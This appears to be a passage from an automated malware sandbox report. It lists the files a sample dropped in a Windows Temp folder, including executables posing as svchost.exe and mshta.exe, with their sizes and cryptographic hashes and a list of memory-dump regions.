
SHA512
6ed0bfd0a498043cccf9ef2d9bebc869c4f5f2befc90636e2e3167b2d0b694c538f93aaeefe221bc08ca3962c6499f402df4934444c9f82883d3314075d5f05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Temp\5a12aaf792a7efda8670f53fd4fa1e3d.bat
Filesize
3.5MB

MD5
921a93456ac88d47914c5de9c9b33f7b

SHA1
b0f3b9d4200e807a8b66cf3b89dcb67a7b2d741b

SHA256
9427b87405fa4abf26b8aa85352dc8536c4e652d36cd0674bee60ae04c92f2a0

SHA512
14f5f1f414cdc4ed6fbafb9e647006f5aaf9be10bf2ac2096f728ca4a68375781c545fbecd2a0370a2038f45a92e26df6c07d453f2a57093020284a7c9b7db81

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client-built.exe
Filesize
3.1MB

MD5
3609d79a3bd384ec00861417a1795932

SHA1
1e2beac3970f2debf5376ed1c4197380d1b1ab39

SHA256
ac77d98fe33fad34e96b6679e70dfb7fe1664249c8961da35b780ff0ef9feb80

SHA512
9ffcec4d0cf24bd199f26eda0b3f1528c9c46224ebc415f9adfe189af9ac2900fbfbb47dc29ba8b9f05b9e53d5b9907d3c51b753ce5d3e694029a86c624c8019

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONPE.exe
Filesize
63KB

MD5
27fe9341167a34f606b800303ac54b1f

SHA1
86373d218b48361bff1c23ddd08b6ab1803a51d0

SHA256
29e13a91af9b0ac77e9b7f8b0c26e5702f46bd8aea0333ca2d191d1d09c70c5d

SHA512
05b83ad544862d9c0cfc2651b2842624cff59fc4f454e0b1a2b36a705b558fad5a834f9f1af9f2626c57f1e3cd9aa400e290eaafb6efeb680422992bcbbde5b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1AA7.tmp
Filesize
1KB

MD5
89c6c9a0a40c364e0f3f14c33eb1ae54

SHA1
01f8cf35cccfd2aefd8e9b1e939c5e31676bc1cd

SHA256
013034d9d20e073d20f19eeaf0d2dd785f6fc8007f9ec1a7a4da7f2cab2edb77

SHA512
00fa4fbef432b77c1f9dbd7dbef60f67f479449399d4fac7138f8a6b9fe055b49dfe1349271078e3fa58608ed51085ca7283473bc35d5e53af4d20d3dd2e17e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjq3adna.sqj.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hat.exe
Filesize
409KB

MD5
e10c7425705b2bd3214fa96247ee21c4

SHA1
7603536b97ab6337fa023bafcf80579c2b4059e6

SHA256
021068ac225e479b124c33d9e7582c17fdea6e625b165b79e2c818479d8094e4

SHA512
47e031992d637fef2a67e4fb08d2d82eaba03eba6b80f3e0e0997153acf0d979d0294276c4a10a97daa50130540230865c56191e6fe8df07dbea11c50fa48a2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\index.exe
Filesize
36.2MB

MD5
3c9563aff1bd31ffa1692db8bf1526a6

SHA1
b9038ff03f20441170548f3910f141d58f46e46f

SHA256
c722b281827e42918c087b7466b6afcf11fe715d45178556f4ecacee6edbdac2

SHA512
1ca5915b8f9b9e2fd34100cd9a4d4d5ccfd106e8c32189ddce90ec06073982871a8ae318051e9afe93247df89a5425efdea346014e2c16005e1193842b18ce0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotFjPWL.bat
Filesize
199B

MD5
736f438d6ab71467026317bae289d3a7

SHA1
a79ce69dc81aab0b8c3d7bd639d7fea9194d8864

SHA256
d2c33ee338d18cb2e931899b5b03afd3cfaa6c744c3e2797b9fd56b60732f89b

SHA512
e95ddbf5186cf8e3b52494076804c02194d87d30d8c99bb400ce14cf2bd0c81df954af333d1dd70512ba8aaf7534910112f938da353b111d2a1b7cf94b3bbb55

Download Submit
C:\Users\Admin\AppData\Local\Temp\mshta.exe
Filesize
67KB

MD5
092a0c6fe885844fd74947e64e7fc11e

SHA1
bfe46f64f36f2e927d862a1a787f146ed2c01219

SHA256
91431cb73305e0f1fdc698907301b6d312a350f667c50765615672e7f10a68f2

SHA512
022589bd17b46e5486971a59b2517956bb15815266e48dc73a7ae9ac9efd42a348af09df471562eb71ffc94ce1e1845d54ca2994663d1496a385bce50ae595f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe
Filesize
79KB

MD5
1f1b23752df3d29e7604ba52aea85862

SHA1
bb582c6cf022098b171c4c9c7318a51de29ebcf4

SHA256
4834d31394f19d42e8d2a035b4c3c9c36441340ea19fe766396848ecfb608960

SHA512
d52722ab73bb15d4a5b0033351f98f168192f382677e6d474f6cf506cf8dc2f5e421e45279b6cac0f074857f41a865d87b5d989450bfcb8eba925b7baa12fbde

Download Submit
C:\Users\Admin\AppData\Local\Temp\zibfp3km\zibfp3km.dll
Filesize
3KB

MD5
d5f96109c47da237dc4caeee8775dc7a

SHA1
196b4d5c225d97e57ed372fab26b811a149c98ce

SHA256
47844af1a3813d19ef17adba601ca27656a87a2afb745ee3756830219bb6b77b

SHA512
5877279a4274dc0026df9b19f7a3555e983f0ef392ef455f79e0116309159e6218a2f6b69db28125c58cc413fe6d08bcd7b3c7c620fd0efaba0dbadd1396fa1d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zibfp3km\CSC27E6C262D41840C7B7A8B9F6A9C885B.TMP
Filesize
652B

MD5
b08f3f3e2b4384b6bc4e4d2dd636f9f5

SHA1
3fc7e6257f570a22de3e65ba8e57181be2759c73

SHA256
74b067f953b882b37f736ad026ef3f2c5622c513dfd7749c9e391e463b9306d2

SHA512
8c5c6e2290a7f891e4e97374586b213752e78e25f9cac98f55c9b9e6af6706caf3f155ae43f5ced3f78427c433cbf5a088b74d0b4f2dc53b239cede001c5516b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zibfp3km\zibfp3km.0.cs
Filesize
737B

MD5
3d57f8f44297464baafa6aeecd3bf4bc

SHA1
f370b4b9f8dba01fbcad979bd663d341f358a509

SHA256
415199eec01052503978381a4f88f4cd970b441fedce519905990ed8b629b0f1

SHA512
4052dd65ca0a505a36c7c344671afcadb8f82cc24b0d1d8362f61565f9d37782e00332908444f6a95286dd1785d074762b27c20be1f361eec67807fad052d798

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zibfp3km\zibfp3km.cmdline
Filesize
369B

MD5
c171cda290c2cdd3e39f4c2030fff55e

SHA1
01ac8e5fe300e88313ef2dc013d855d750cca176

SHA256
680a9102e5e2ba6b5b0ce4994e0b4802fe7548e4517dfcaeaff0927259fb60b4

SHA512
1d22e7f7494aeace0a1f694325e9db0c6882d60e989cd590691543c0fc9949964721a2b44b026dd754911f2b91da56177d25d18c512c4c50f18649f165fd4159

Download Submit
memory/496-0-0x00007FF971183000-0x00007FF971185000-memory.dmp

Filesize
8KB

Download
memory/496-1-0x0000000000E40000-0x000000000362E000-memory.dmp

Filesize
39.9MB

Download
memory/628-59-0x00007FF971180000-0x00007FF971C41000-memory.dmp

Filesize
10.8MB

Download
memory/628-185-0x00007FF971180000-0x00007FF971C41000-memory.dmp

Filesize
10.8MB

Download
memory/628-183-0x00007FF971180000-0x00007FF971C41000-memory.dmp

Filesize
10.8MB

Download
memory/628-182-0x000000001E140000-0x000000001E14E000-memory.dmp

Filesize
56KB

Download
memory/628-32-0x0000000000F90000-0x0000000000FA8000-memory.dmp

Filesize
96KB

Download
memory/628-63-0x00007FF971180000-0x00007FF971C41000-memory.dmp

Filesize
10.8MB

Download
memory/1344-146-0x00000207F1690000-0x00000207F1698000-memory.dmp

Filesize
32KB

Download
memory/1344-102-0x00000207F16A0000-0x00000207F16C2000-memory.dmp

Filesize
136KB

Download
memory/1852-60-0x00007FF971180000-0x00007FF971C41000-memory.dmp

Filesize
10.8MB

Download
memory/1852-46-0x00000000002B0000-0x00000000002C6000-memory.dmp

Filesize
88KB

Download
memory/1852-184-0x00007FF971180000-0x00007FF971C41000-memory.dmp

Filesize
10.8MB

Download
memory/1992-138-0x0000000006710000-0x0000000006722000-memory.dmp

Filesize
72KB

Download
memory/1992-155-0x0000000006B50000-0x0000000006B8C000-memory.dmp

Filesize
240KB

Download
memory/1992-84-0x0000000005B50000-0x0000000005BB6000-memory.dmp

Filesize
408KB

Download
memory/1992-74-0x00000000057B0000-0x0000000005842000-memory.dmp

Filesize
584KB

Download
memory/1992-181-0x0000000007020000-0x000000000702A000-memory.dmp

Filesize
40KB

Download
memory/1992-64-0x0000000000C90000-0x0000000000CFC000-memory.dmp

Filesize
432KB

Download
memory/1992-65-0x0000000005CC0000-0x0000000006264000-memory.dmp

Filesize
5.6MB

Download
memory/3996-61-0x0000000000AF0000-0x0000000000E14000-memory.dmp

Filesize
3.1MB

Download
memory/3996-78-0x000000001D730000-0x000000001D780000-memory.dmp

Filesize
320KB

Download
memory/3996-81-0x000000001D840000-0x000000001D8F2000-memory.dmp

Filesize
712KB

Download
memory/4988-47-0x0000000000BE0000-0x0000000000BFA000-memory.dmp

Filesize
104KB

Download